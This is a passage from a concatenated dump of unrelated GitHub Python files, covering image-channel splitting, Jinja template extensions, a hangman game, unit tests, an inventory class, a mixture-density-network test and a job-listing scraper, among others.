imS[:,:,0])\ncv2.imwrite('b.jpeg', imS[:,:,0])\ng=cv2.imshow('Green Channel', imS[:,:,1])\ncv2.imwrite('g.jpeg', imS[:,:,1])\nr=cv2.imshow('Red Channel', imS[:,:,2])\ncv2.imwrite('r.jpeg', imS[:,:,2])\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"frenzytejask98/VR_Assignment1","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1130175623","text":"from jinja2.ext import Extension, Markup\nfrom jinja2.lexer import Token, describe_token\nfrom jinja2.nodes import CallBlock, Const\nfrom compressinja.html import HtmlCompressor, StreamProcessContext\nfrom piecrust.rendering import format_text\n\n\nclass PieCrustFormatExtension(Extension):\n tags = set(['pcformat'])\n\n def __init__(self, environment):\n super(PieCrustFormatExtension, self).__init__(environment)\n\n def parse(self, parser):\n lineno = next(parser.stream).lineno\n args = [parser.parse_expression()]\n body = parser.parse_statements(['name:endpcformat'], drop_needle=True)\n return CallBlock(self.call_method('_formatTimed', args),\n [], [], body).set_lineno(lineno)\n\n def _formatTimed(self, format_name, caller=None):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._format(format_name, caller)\n\n def _format(self, format_name, caller=None):\n body = caller()\n text = format_text(self.environment.app,\n format_name,\n Markup(body.rstrip()).unescape(),\n exact_format=True)\n return text\n\n\nclass PieCrustHighlightExtension(Extension):\n tags = set(['highlight', 'geshi'])\n\n def __init__(self, environment):\n super(PieCrustHighlightExtension, self).__init__(environment)\n\n def parse(self, parser):\n lineno = next(parser.stream).lineno\n\n # Extract the language name.\n args = [parser.parse_expression()]\n\n # Extract optional arguments.\n kwarg_names = {'line_numbers': 0, 'use_classes': 0, 'class': 1,\n 'id': 1}\n kwargs = {}\n while not parser.stream.current.test('block_end'):\n name = parser.stream.expect('name')\n if name.value not in kwarg_names:\n raise Exception(\"'%s' is not a valid argument for the code \"\n \"highlighting tag.\" % name.value)\n if kwarg_names[name.value] == 0:\n kwargs[name.value] = Const(True)\n elif parser.stream.skip_if('assign'):\n kwargs[name.value] = parser.parse_expression()\n\n # body of the block\n body = parser.parse_statements(['name:endhighlight', 'name:endgeshi'],\n drop_needle=True)\n\n return CallBlock(self.call_method('_highlightTimed', args, kwargs),\n [], [], body).set_lineno(lineno)\n\n def _highlightTimed(self, lang, line_numbers=False, use_classes=False,\n css_class=None, css_id=None, caller=None):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._highlight(lang, line_numbers, use_classes,\n css_class, css_id, caller)\n\n def _highlight(self, lang, line_numbers=False, use_classes=False,\n css_class=None, css_id=None, caller=None):\n from pygments import highlight\n from pygments.formatters import HtmlFormatter\n from pygments.lexers import get_lexer_by_name, guess_lexer\n\n # Try to be mostly compatible with Jinja2-highlight's settings.\n body = caller()\n\n if lang is None:\n lexer = guess_lexer(body)\n else:\n lexer = get_lexer_by_name(lang, stripall=False)\n\n if css_class is None:\n try:\n css_class = self.environment.jinja2_highlight_cssclass\n except AttributeError:\n pass\n\n if css_class is not None:\n formatter = HtmlFormatter(cssclass=css_class,\n linenos=line_numbers)\n else:\n formatter = HtmlFormatter(linenos=line_numbers)\n\n code = highlight(Markup(body.rstrip()).unescape(), lexer, formatter)\n return code\n\n\ndef get_highlight_css(style_name='default', class_name='.highlight'):\n from pygments.formatters import HtmlFormatter\n return HtmlFormatter(style=style_name).get_style_defs(class_name)\n\n\nclass PieCrustCacheExtension(Extension):\n tags = set(['pccache', 'cache'])\n\n def __init__(self, environment):\n super(PieCrustCacheExtension, self).__init__(environment)\n environment.extend(\n piecrust_cache_prefix='',\n piecrust_cache={}\n )\n\n def parse(self, parser):\n # the first token is the token that started the tag. In our case\n # we only listen to ``'pccache'`` so this will be a name token with\n # `pccache` as value. We get the line number so that we can give\n # that line number to the nodes we create by hand.\n lineno = next(parser.stream).lineno\n\n # now we parse a single expression that is used as cache key.\n args = [parser.parse_expression()]\n\n # now we parse the body of the cache block up to `endpccache` and\n # drop the needle (which would always be `endpccache` in that case)\n body = parser.parse_statements(['name:endpccache', 'name:endcache'],\n drop_needle=True)\n\n # now return a `CallBlock` node that calls our _renderCache\n # helper method on this extension.\n return CallBlock(self.call_method('_renderCacheTimed', args),\n [], [], body).set_lineno(lineno)\n\n def _renderCacheTimed(self, name, caller):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._renderCache(name, caller)\n\n def _renderCache(self, name, caller):\n key = self.environment.piecrust_cache_prefix + name\n\n rcs = self.environment.app.env.render_ctx_stack\n ctx = rcs.current_ctx\n\n # try to load the block from the cache\n # if there is no fragment in the cache, render it and store\n # it in the cache.\n pair = self.environment.piecrust_cache.get(key)\n if pair is not None:\n for usn in pair[1]:\n ctx.addUsedSource(usn)\n return pair[0]\n\n prev_used = set(ctx.current_used_source_names)\n rv = caller()\n after_used = set(ctx.current_used_source_names)\n used_delta = after_used.difference(prev_used)\n self.environment.piecrust_cache[key] = (rv, used_delta)\n return rv\n\n\nclass PieCrustSpacelessExtension(HtmlCompressor):\n \"\"\" A re-implementation of `SelectiveHtmlCompressor` so that we can\n both use `strip` or `spaceless` in templates.\n \"\"\"\n def filter_stream(self, stream):\n ctx = StreamProcessContext(stream)\n strip_depth = 0\n while 1:\n if stream.current.type == 'block_begin':\n for tk in ['strip', 'spaceless']:\n change = self._processToken(ctx, stream, tk)\n if change != 0:\n strip_depth += change\n if strip_depth < 0:\n ctx.fail('Unexpected tag end%s' % tk)\n break\n if strip_depth > 0 and stream.current.type == 'data':\n ctx.token = stream.current\n value = self.normalize(ctx)\n yield Token(stream.current.lineno, 'data', value)\n else:\n yield stream.current\n next(stream)\n\n def _processToken(self, ctx, stream, test_token):\n change = 0\n if (stream.look().test('name:%s' % test_token) or\n stream.look().test('name:end%s' % test_token)):\n stream.skip()\n if stream.current.value == test_token:\n change = 1\n else:\n change = -1\n stream.skip()\n if stream.current.type != 'block_end':\n ctx.fail('expected end of block, got %s' %\n describe_token(stream.current))\n stream.skip()\n return change\n","repo_name":"ludovicchabant/PieCrust2","sub_path":"piecrust/templating/jinja/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"68"} +{"seq_id":"2703322713","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup, Extension\nfrom distutils.sysconfig import customize_compiler\nfrom distutils.command.build_ext import build_ext\n\nimport os\nimport glob\n\n\n# https://stackoverflow.com/questions/8106258/cc1plus-warning-command-line-option-wstrict-prototypes-is-valid-for-ada-c-o/9740721\n# Avoid a gcc warning below:\n# cc1plus: warning: command line option ‘-Wstrict-prototypes’ is valid\n# for C/ObjC but not for C++\nclass BuildExt(build_ext):\n def build_extensions(self):\n customize_compiler(self.compiler)\n try:\n self.compiler.compiler_so.remove(\"-Wstrict-prototypes\")\n except (AttributeError, ValueError):\n pass\n build_ext.build_extensions(self)\n\n\n# cpp sources\nsources = glob.glob(os.path.join('src', 'audacity', '*.cpp'))\nsources += ['src/pyaudacity/noiseredmodule.cpp']\n\n# additional CFLAGS\nextra_compile_args = ['-std=c++14', '-Wextra', '-pedantic',\n '-Wno-unused-parameter', '-Wno-unused-variable',\n '-Wno-implicit-fallthrough']\n\n# create build module\nmodule = Extension(name='cmodule',\n # define_macros=[('MAJOR_VERSION', '2'), ('MINOR_VERSION', '1')],\n libraries=['stdc++', 'sndfile', 'soxr'],\n language='c++14',\n extra_compile_args=extra_compile_args,\n include_dirs=['src/audacity'],\n sources=sources,\n )\n\n# run build\nsetup(name='pyaudacity',\n cmdclass={'build_ext': BuildExt},\n version='0.1',\n ext_package='pyaudacity',\n packages=['pyaudacity'],\n package_dir={'pyaudacity': 'src/pyaudacity'},\n description='Audacity noise reduction python porting library.',\n author='photom',\n license='GPL-2.0',\n author_email='photometrician@gmail.com',\n url='https://github.com/photom/pyaudacity_noisered',\n ext_modules=[module])\n","repo_name":"photom/pyaudacity_noisered","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"15581821452","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n return set(secretWord).issubset(lettersGuessed)\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n value = \"\"\n string = \"\"\n for i in secretWord:\n if i in lettersGuessed:\n value = i + \" \"\n else:\n value = \"_ \"\n string += value\n return string\ndef getAvailableLetters(lettersGuessed):\n import string\n lettersA = list(string.ascii_lowercase)\n b = [ x for x in lettersA if not x in lettersGuessed ] \n return ''.join(b)\ndef hangman(secretWord):\n \n print(\"Welcome to the game, Hangman!\") \n print(\"I am thinking of a word that is\", str(len(secretWord)), \" letters long.\") \n print(\"-------------\") \n guessLeft = 8 \n lettersGuessed=[]\n while guessLeft > 0 and not isWordGuessed(secretWord, lettersGuessed):\n print(\"You have \" + str(guessLeft) + \" guesses left.\")\n print(\"Available letters: \" + str(getAvailableLetters(lettersGuessed)))\n guess = (str(input(\"Please guess a letter: \"))).lower()\n if guess not in lettersGuessed:\n lettersGuessed.append(guess)\n if guess in secretWord:\n print('Good guess: ', str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n else:\n guessLeft -= 1\n print(\"Oops! That letter is not in my word: \", str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n else:\n print(\"Oops! You've already guessed that letter: \", str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n if isWordGuessed(secretWord, lettersGuessed): \n print(\"Congratulations, you won!\") \n else:\n print(\"Sorry, you ran out of guesses. The word was\", str(secretWord)) \n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"krausce/Hangman","sub_path":"ps3_hangman.py","file_name":"ps3_hangman.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70613022937","text":"def time_on_road(in_h, in_m, out_h, out_m):\n t_minute = (out_h*60 + out_m) - (in_h*60 + in_m)\n if t_minute > 0:\n return t_minute/60\n else:\n #past 24 hour, in minutes \n t_minute = (1440 + out_m) - (in_h*60 + in_m)\n return t_minute/60\n\nwith open(\"forgalom.txt\", \"r\") as f:\n f=[x.split() for x in f.readlines()]\n over_100km_per_h = [] \n for i in range(len(f)):\n #The time of the car while on the road in minutes\n t_hour = time_on_road(int(f[i][1]), int(f[i][2]), int(f[i][3]), int(f[i][4]))\n #the speed of the car on a 10 km road in hours now\n v=10/t_hour\n if v >= 100:\n over_100km_per_h.append(f[i])\n \nprint(over_100km_per_h)\nprint((len(over_100km_per_h)))\n ","repo_name":"molnar780/Neuman-verseny","sub_path":"Neumann/2022/1.ford/2 fel/2,b.py","file_name":"2,b.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37286611005","text":"import unittest\nimport collections\nfrom unittest import mock\nfrom unittest.mock import MagicMock\nfrom io import StringIO\n\nfrom correios.core import (\n get_url,\n parse_xml,\n get_servicos_list,\n handle_request,\n)\n\nclass TestGetUrl(unittest.TestCase):\n def setUp(self):\n self.endpoint = 'http://test.com/'\n\n def test_empty_params(self):\n params = {}\n expected = 'http://test.com/?'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n def test_one_param(self):\n params = {\n 'foo': 'bar',\n }\n expected = 'http://test.com/?foo=bar'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n def test_n_params(self):\n params = collections.OrderedDict()\n params['foo'] = 'bar'\n params['uni'] = 'duni te'\n params['abra'] = 'cadabra'\n \n expected = 'http://test.com/?foo=bar&uni=duni+te&abra=cadabra'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n\nclass TestParseXML(unittest.TestCase):\n def setUp(self):\n self.xml = \"\"\"\n \n \n 04510\n 26,20\n 6\n \n \"\"\"\n\n def test_empty_string(self):\n xml = ''\n self.assertEqual(parse_xml(xml), {})\n\n def test_xml_with_empty_value(self):\n xml = ''\n expected = {\n 'Servicos': None,\n }\n self.assertEqual(parse_xml(xml), expected)\n\n def test_parse_xml_ok(self):\n expected = {\n 'Servicos': {\n 'cServico': {\n 'Codigo': '04510',\n 'Valor': '26,20',\n 'PrazoEntrega': '6',\n }\n }\n }\n self.assertEqual(parse_xml(self.xml), expected)\n\n\n\nclass TestGetServicosList(unittest.TestCase):\n def test_empty_dict(self):\n data = {}\n self.assertEqual(get_servicos_list(data), [])\n\n def test_with_servicos_empty(self):\n data = {\n 'Servicos': '',\n }\n self.assertEqual(get_servicos_list(data), [])\n\n def test_with_servicos_and_servico_not_dict(self):\n data = {\n 'Servicos': {\n 'cServico': ['foo', 'bar'],\n }\n }\n self.assertEqual(get_servicos_list(data), ['foo', 'bar'])\n\n\n# RESPONSE_MOCK_OK = \"\"\"\n# \n# \n# 04510\n# 26,20\n# 6\n# 26,20\n# 0,00\n# 0,00\n# 0,00\n# S\n# N\n# \n# 0\n# \n# \n# \"\"\"\n\n\n# class TestHandleRequest(unittest.TestCase):\n# def setUp(self):\n# self.url = 'http://test.com/?foo=bar&uni=duni+te&abra=cadabra'\n\n# @mock.patch('correios.core.urlopen', return_value=StringIO(RESPONSE_MOCK_OK)) \n# def test_response_ok(self, mock_urlopen):\n# self.assertEqual(handle_request(self.url), RESPONSE_MOCK_OK)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"edussilva/correios","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12663459160","text":"class InventoryControl:\n INGREDIENTS = {\n 'hamburguer': ['pao', 'carne', 'queijo'],\n 'pizza': ['massa', 'queijo', 'molho'],\n 'misto-quente': ['pao', 'queijo', 'presunto'],\n 'coxinha': ['massa', 'frango'],\n }\n MINIMUM_INVENTORY = {\n 'pao': 50,\n 'carne': 50,\n 'queijo': 100,\n 'molho': 50,\n 'presunto': 50,\n 'massa': 50,\n 'frango': 50,\n }\n\n def __init__(self):\n self.data = list()\n\n def add_new_order(self, customer, order, day):\n check = self.check_ingredient_availability(order)\n if check is False:\n return False\n else:\n self.data.append({\n \"id\": len(self.data),\n \"customer\": customer,\n \"order\": order,\n \"day\": day\n })\n\n def get_quantities_to_buy(self):\n buy_list = self.MINIMUM_INVENTORY.copy()\n for key in buy_list.keys():\n buy_list[key] = 0\n for order in self.data:\n buy_list[self.INGREDIENTS[order[\"order\"]][0]] += 1\n buy_list[self.INGREDIENTS[order[\"order\"]][1]] += 1\n if len(self.INGREDIENTS[order[\"order\"]]) == 3:\n buy_list[self.INGREDIENTS[order[\"order\"]][2]] += 1\n return buy_list\n\n def check_ingredient_availability(self, order):\n quantities = self.get_quantities_to_buy()\n for ing in self.INGREDIENTS[order]:\n if quantities[ing] >= self.MINIMUM_INVENTORY[ing]:\n return False\n\n def get_available_dishes(self):\n result = set()\n for order in self.INGREDIENTS.keys():\n if self.check_ingredient_availability(order) is not False:\n result.add(order)\n return result\n","repo_name":"btrndd/restaurant-orders","sub_path":"src/inventory_control.py","file_name":"inventory_control.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35635289892","text":"from typing import List\nimport numpy as np\nfrom collections import Counter\nfrom itertools import product\nfrom functools import reduce\n\n\nclass CommonTechniquesBasic:\n def __init__(self):\n self.mb_containsDuplicates = self.containsDuplicates(a=[1, 2, 3, 1])\n self.mb_sumOfTwo = self.sumOfTwo([1, 2, 3], b=[10, 20, 30, 40], v=42)\n\n self.mi_sumInRange=self.sumInRange(nums=[3, 0, -2, 6, -3, 2], queries=[[0, 2], [2, 5], [0, 5]])\n self.mi_productExceptSelf=self.productExceptSelf(nums=[1, 2, 3, 4],m=2)\n\n def containsDuplicates(self, a):\n if (len(a) < 2):\n return False\n a.sort()\n for i in range(len(a) - 1):\n if a[i] == a[i + 1]:\n return True\n return False\n\n def sumOfTwo(self, a, b, v):\n if not a or not b:\n return False\n b = set(b) # kill duplicates\n for i in range(len(a)):\n diff = v - a[i]\n if diff in b:\n return True\n return False\n\n def sumInRange(self, nums, queries): # one hidden test fails, execution time limit\n res = nums[:]\n sums = []\n for i in range(len(queries)):\n first = queries[i][0]\n last = queries[i][1]\n sublist = res[first:last + 1]\n temp = sum(sublist)\n sums.append(temp)\n return sum(sums) % (10 ** 9 + 7)\n\n def productExceptSelf(self, nums, m):\n tempWithouti=[]\n f_i = lambda x, y: x * y\n for i in range(len(nums)):\n removed=nums.pop(i)\n red = reduce(f_i,nums)\n tempWithouti.append(red)\n nums.insert(i,removed)\n return tempWithouti\n\n\n\n\n\n\n\nclass NumberTheory:\n def __init__(self):\n self.mi_missingNumber = self.missingNumber(arr=[3, 1, 0])\n\n def missingNumber(self, arr):\n labels = sum(list(range(len(arr) + 1)))\n currentArr = sum(arr)\n missingLabel = labels - currentArr\n return missingLabel\n\n\nclass Sorting:\n def __init__(self):\n self.ml_bubbleSort = self.bubbleSort(items=[2, 4, 1, 5])\n self.ml_bubbleSort2 = self.bubbleSort2(items=[2, 2, 2, 3, 7, 8, 9, 10, 3])\n\n def bubbleSort(self, items):\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n for i in range(len(items) - 1):\n if items[i + 1] < items[i]:\n self.swap(i, i + 1, items)\n is_sorted = False\n return items\n\n def swap(self, i, j, items):\n items[i], items[j] = items[j], items[i]\n\n def bubbleSort2(self, items):\n\n def swap(firstIndex, secondIndex):\n temp = items[firstIndex]\n items[firstIndex] = items[secondIndex]\n items[secondIndex] = temp\n\n length = len(items) - 1\n\n for i in range(length):\n j = 0\n stop = length - i\n while j < stop - 1:\n if items[j] > items[j + 1]:\n swap(j, j + 1)\n j += 1\n return items\n\n\nclass Counting:\n def __init__(self):\n self.ms_pressingButtons = self.pressingButtons(buttons='9')\n\n def pressingButtons(self, buttons):\n if len(buttons) == 0:\n return []\n numb = ['2', '3', '4', '5', '6', '7', '8', '9']\n letters = ['abc', 'def', 'ghi', 'jkl', 'mno', 'pqrs', 'tuv', 'wxyz']\n d = dict(zip(numb, letters))\n cartesian = list(product(*[d[i] for i in buttons]))\n res = [*map(\"\".join, cartesian)]\n return res\n\n\nclass Strings:\n def __init__(self):\n self.ms_amendTheSentence = self.amendTheSentence(s='CodesignalIsAwesome')\n self.ms_strstr=self.strstr(s='CodefightsIsAwesome',x='IsA')\n self.ms_classifyStrings=self.classifyStrings(s='auy')\n\n def amendTheSentence(self, s):\n corrected = ''\n for i in range(len(s)):\n if ord(s[i]) in range(65, 91) and i == 0:\n x = s[i].lower()\n elif ord(s[i]) in range(65, 91) and i >= 1:\n x = ' ' + s[i].lower()\n else:\n x = s[i]\n corrected = corrected + x\n return corrected\n\n def strstr(self,s,x): #hard task\n pass\n\n def classifyStrings(self,s):\n pass\n\nclass HeapsStackQues:\n pass\n\nif __name__ == \"__main__\":\n coomtechb = CommonTechniquesBasic()\n numTheo = NumberTheory()\n sortTech = Sorting()\n counti = Counting()\n strings = Strings()\n\n print('TheEnd')\n","repo_name":"krzysiekbienias/CodeSignal","sub_path":"interviewPractice.py","file_name":"interviewPractice.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10966722898","text":"\n\nESTUDIANTES = []\n\n\ndef Persona(nombre1,apellido1):\n ESTUDIANTES.append([nombre1,apellido1])\n\n\nfor i in range(1,3):\n nombre = input(\"Digite su Nombre: \")\n apellido = input(\"Digite se Apellido: \")\n Persona(nombre, apellido)\n\nprint(ESTUDIANTES)","repo_name":"devchrisar/Playground","sub_path":"ejercicios_mintic2022/ciclo 01/13_TALLER/Ejemplo8.py","file_name":"Ejemplo8.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73341202137","text":"from absl.testing import parameterized\nimport numpy as np\nfrom tensor2robot.layers import mdn\nimport tensorflow.compat.v1 as tf\nimport tensorflow_probability as tfp\n\n\nclass MDNTest(tf.test.TestCase, parameterized.TestCase):\n\n def test_get_mixture_distribution(self):\n sample_size = 10\n num_alphas = 5\n batch_shape = (4, 2)\n alphas = tf.random.normal(batch_shape + (num_alphas,))\n mus = tf.random.normal(batch_shape + (sample_size * num_alphas,))\n sigmas = tf.random.normal(batch_shape + (sample_size * num_alphas,))\n params = tf.concat([alphas, mus, sigmas], -1)\n output_mean_np = np.random.normal(size=(sample_size,))\n gm = mdn.get_mixture_distribution(\n params, num_alphas, sample_size, output_mean=output_mean_np)\n self.assertEqual(gm.batch_shape, batch_shape)\n self.assertEqual(gm.event_shape, sample_size)\n\n # Check that the component means were translated by output_mean_np.\n component_means = gm.components_distribution.mean()\n with self.test_session() as sess:\n # Note: must get values from the same session run, since params will be\n # randomized across separate session runs.\n component_means_np, mus_np = sess.run([component_means, mus])\n mus_np = np.reshape(mus_np, component_means_np.shape)\n self.assertAllClose(component_means_np, mus_np + output_mean_np)\n\n @parameterized.parameters((True,), (False,))\n def test_predict_mdn_params(self, condition_sigmas):\n sample_size = 10\n num_alphas = 5\n inputs = tf.random.normal((2, 16))\n with tf.variable_scope('test_scope'):\n dist_params = mdn.predict_mdn_params(\n inputs, num_alphas, sample_size, condition_sigmas=condition_sigmas)\n expected_num_params = num_alphas * (1 + 2 * sample_size)\n self.assertEqual(dist_params.shape.as_list(), [2, expected_num_params])\n\n gm = mdn.get_mixture_distribution(dist_params, num_alphas, sample_size)\n stddev = gm.components_distribution.stddev()\n with self.test_session() as sess:\n sess.run(tf.global_variables_initializer())\n stddev_np = sess.run(stddev)\n if condition_sigmas:\n # Standard deviations should vary with input.\n self.assertNotAllClose(stddev_np[0], stddev_np[1])\n else:\n # Standard deviations should *not* vary with input.\n self.assertAllClose(stddev_np[0], stddev_np[1])\n\n def test_gaussian_mixture_approximate_mode(self):\n sample_size = 10\n num_alphas = 5\n # Manually set alphas to 1 in zero-th column and 0 elsewhere, making the\n # first component the most likely.\n alphas = tf.one_hot(2 * [0], num_alphas)\n mus = tf.random.normal((2, num_alphas, sample_size))\n sigmas = tf.ones_like(mus)\n mix_dist = tfp.distributions.Categorical(logits=alphas)\n comp_dist = tfp.distributions.MultivariateNormalDiag(\n loc=mus, scale_diag=sigmas)\n gm = tfp.distributions.MixtureSameFamily(\n mixture_distribution=mix_dist, components_distribution=comp_dist)\n approximate_mode = mdn.gaussian_mixture_approximate_mode(gm)\n with self.test_session() as sess:\n approximate_mode_np, mus_np = sess.run([approximate_mode, mus])\n # The approximate mode should be the mean of the zero-th (most likely)\n # component.\n self.assertAllClose(approximate_mode_np, mus_np[:, 0, :])\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"google-research/tensor2robot","sub_path":"layers/mdn_test.py","file_name":"mdn_test.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"68"} +{"seq_id":"1298561617","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\nC, N = map(int, input().split())\ncities = [list(map(int, input().split())) for _ in range(N)]\nmax_reword = max(cities, key=lambda x: x[1])[1]\n\nINF = int(1e9)\ndp = [INF] * (C+1+max_reword)\ndp[0] = 0\n\n# max_reword가 필요한 이유는?\n# max_reword가 없었다면, C가 모든 reword보다 작을 때는?\n# cities를 정렬해야할까?\nfor cost, reword in cities:\n for cur in range(reword, C+1+max_reword):\n dp[cur] = min(dp[cur-reword] + cost, dp[cur])\n# print(dp)\nprint(min(dp[C:]))","repo_name":"jujemu/algorithm","sub_path":"dp/ex_bj_1106.py","file_name":"ex_bj_1106.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14725879595","text":"import random\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport csv\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\n\ndef get_page(url):\n cookie = 'wd_guid=3f319504-2887-4ee3-b92f-799516dbf45b; historyState=state; _bl_uid=1nl987be8qsjw2gyOvX6vn9qF7ey; wt2=D4p-tJtlg0POIOZSgEvEIbCS2Cg52Ck1J9GLiy7XmhywhKHRVLngaaNoTGWpDurj-7yA1CzscNls6BYxNKbxgYw~~; wbg=0; Hm_lvt_194df3105ad7148dcf2b98a91b5e727a=1661430630,1661452564,1661827801,1661831717; Hm_lpvt_194df3105ad7148dcf2b98a91b5e727a=1661831734; __g=-; __l=l=%2Fwww.zhipin.com%2Fweb%2Fgeek%2Fjob%3Fquery%3Dpython%25E7%2588%25AC%25E8%2599%25AB%26city%3D100010000&s=3&friend_source=0; __c=1661831743; __a=20752938.1661401335.1661827824.1661831743.27.5.3.27; geek_zp_token=V1RNgjE-T62FhvVtRvyRwQKimy5TvRwSo~; __zp_stoken__=951feLAQQUD4kLFcDYnELRzAjR0l7JGYCWAUFW0YpATUxVwcoCGk8Fho8FxoKdQFcJU4BNBkBaRxVGklbQGJpPGxHCzIMIWQOPC0PQHl4e118KV8sBBhBaDJ1RU08OxI2ez8UHw0SXVtWAHA9PjBMGnxgMi1jeAUUcA9CG35cViNUIT1VBh1mAD1KMAZ%2BAiA%2FIEQ3PFohIQ%3D%3D'\n #Referer = 'https://www.zhipin.com/web/geek/job?query=python&city=101040100'\n #https://www.zhipin.com/web/geek/job?query=python%E7%88%AC%E8%99%AB&city=101020100\n '''\n proxy = {\n 'http':'223.96.90.216:8085'\n }\n '''\n\n headers = {\n\n 'Cookie':cookie,\n #'Referer':Referer,\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36'\n }\n try:\n response = requests.get(url,headers=headers)#,proxies=proxy\n if response.status_code == 200:\n time.sleep(4)\n response.encoding = response.apparent_encoding\n return response.text\n except requests.ConnectionError as e:\n print('Error', e.args)\n\n\ndef get_joblist(url):\n job_lists = []\n html = get_page(url)\n print(html)\n \n #1.已经获取到了第一页的信息(总页面),接下来应该是获取主页面的url列表\n data = json.loads(html)\n datas = data['zpData']['jobList']\n\n for i in datas:\n securityId = i['securityId']\n encryptJobId = i['encryptJobId']\n lid = i['lid']\n\n urls = 'https://www.zhipin.com/job_detail/{}.html?lid={}&securityId={}'.format(encryptJobId,lid,securityId)\n\n job_lists.append(urls)\n return job_lists\n \n\ndef get_job(html):\n\n soup = BeautifulSoup(html, 'lxml')\n job_all = soup.find_all('div', class_=\"info-primary\")\n if (job_all == []):\n print(\"cookie已过期\")\n #print(job_all)\n \n try:\n # 职位名\n job_title = re.findall('

        '9':\n if s[2] < '0' or s[2]>'9': \n if s[3] < '0' or s[3]>'9':\n print(\"No\")\n if sh.find(s[0]) != -1:\n if sh.find(s[4]) != -1:\n if sh.find(s[5]) != -1:\n print(\"Yes\")\n else:\n print(\"No\")\n else:\n print(\"No\")\n else:\n print(\"No\")\n","repo_name":"Nuray-web/python","sub_path":"acmp/номера_автобусов.py","file_name":"номера_автобусов.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34545603171","text":"# 문제링크 : https://school.programmers.co.kr/learn/courses/30/lessons/159994\r\ndef solution(cards1, cards2, goal):\r\n try :\r\n for i in range(len(cards1) + len(cards2)) :\r\n if len(cards1) > 0 and cards1[0] == goal[0] :\r\n cards1 = cards1[1:]\r\n goal = goal[1:]\r\n elif len(cards2) > 0 and cards2[0] == goal[0] :\r\n cards2 = cards2[1:]\r\n goal = goal[1:] \r\n else :\r\n return \"No\"\r\n if len(goal) == 0 :\r\n return \"Yes\"\r\n except :\r\n return \"No\"\r\n","repo_name":"kyungjun-kim/Problem_Solving","sub_path":"Programmers/Level_1/카드뭉치.py","file_name":"카드뭉치.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"27402865001","text":"import logging\nimport threading\nimport weakref\n\nfrom .timer import Timer\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"MotorSafety\"]\n\n\nclass MotorSafety:\n \"\"\"Provides mechanisms to safely shutdown motors if they aren't updated\n often enough.\n\n This base class runs a watchdog timer and calls the subclass's stopMotor()\n function if the timeout expires.\n\n The subclass should call feed() whenever the motor value is updated.\n \"\"\"\n\n DEFAULT_SAFETY_EXPIRATION = 0.1\n __instanceList = weakref.WeakSet()\n __listMutex = threading.Lock()\n\n 